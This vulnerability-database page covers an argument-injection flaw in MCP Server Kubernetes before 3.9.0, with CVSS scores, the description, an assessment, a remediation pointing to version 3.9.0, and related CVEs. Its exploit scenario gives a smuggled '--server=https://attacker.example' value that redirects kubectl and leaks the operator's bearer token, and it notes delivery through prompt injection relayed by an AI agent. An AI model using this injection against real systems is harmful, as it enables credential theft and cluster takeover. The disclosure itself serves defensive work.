Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-reachable tool inputs with no privileges or interaction (PR:N/UI:N per vendor vector); stolen operator token yields high C/I/A over the cluster; scope kept unchanged to align with the 4.0 SC:N mapping.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
MCP Server Kubernetes before 3.9.0 contains an argument injection vulnerability in structured tools (kubectl_get, kubectl_describe, kubectl_delete) that allows attackers to bypass the assertNoDangerousFlags security check by supplying resourceType and name parameters with leading dashes. Attackers can inject the --server flag to redirect kubectl commands to an attacker-controlled API server, causing the operator's bearer token to be transmitted externally and enabling full cluster compromise.
Articles & Coverage 1
AnalysisAI
Argument injection in Flux159 MCP Server Kubernetes before 3.9.0 lets remote attackers redirect kubectl operations to an attacker-controlled API server by smuggling a leading-dash --server flag through the resourceType and name parameters of the kubectl_get, kubectl_describe, and kubectl_delete structured tools. Because the injected values bypass the assertNoDangerousFlags check, the operator's bearer token is transmitted to the external server, enabling full Kubernetes cluster compromise. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to supply the resourceType or name parameter to one of the vulnerable structured tools (kubectl_get, kubectl_describe, or kubectl_delete) in a version before 3.9.0, with the value crafted to begin with a leading dash so it is parsed by kubectl as the `--server` flag; the MCP server must be configured with usable Kubernetes credentials (bearer token/kubeconfig) that get attached to the redirected request. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The signals are largely consistent and point to genuine high priority. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who can influence the MCP tool inputs - for example via a prompt-injection payload the AI agent relays, or a directly exposed MCP endpoint - calls kubectl_get with a name or resourceType of `--server=https://attacker.example`. The vulnerable server passes this to kubectl, which sends the request (and the operator's bearer token) to the attacker's rogue API server; publicly available exploit code demonstrates the technique. … |
| Remediation | Vendor-released patch: upgrade MCP Server Kubernetes to version 3.9.0 or later (https://github.com/Flux159/mcp-server-kubernetes/releases/tag/3.9.0), which corresponds to PR #329 and commit d7890f50a4567bf5d9842541ba6f41e180227f9a that hardens the argument handling. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: identify all systems running Flux159 MCP Server Kubernetes versions prior to 3.9.0 and assess network exposure; isolate or disable affected services if immediate patching is not possible. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Kubernetes
View allA critical vulnerability in Kubernetes ingress-nginx controller allows unauthenticated attackers with pod network access
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Kubernetes ingress-nginx contains a configuration injection vulnerability via the mirror-target and mirror-host Ingress
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingres
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match-c
Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.exter
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Rated critical severity (CVSS 9.9), this vulne
The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4
Kyverno Kubernetes policy engine prior to 1.x has a privilege escalation vulnerability (CVSS 9.9) allowing policy bypass
Kamaji is the Hosted Control Plane Manager for Kubernetes. Rated critical severity (CVSS 9.9), this vulnerability is rem
Jumpserver is a popular open source bastion host, and Koko is a Jumpserver component that is the Go version of coco, ref
String filter bypass in Inspektor Gadget Kubernetes eBPF tooling before fix. Insufficient string escaping enables filter
Same technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42987
GHSA-wmg3-h8mf-wgvr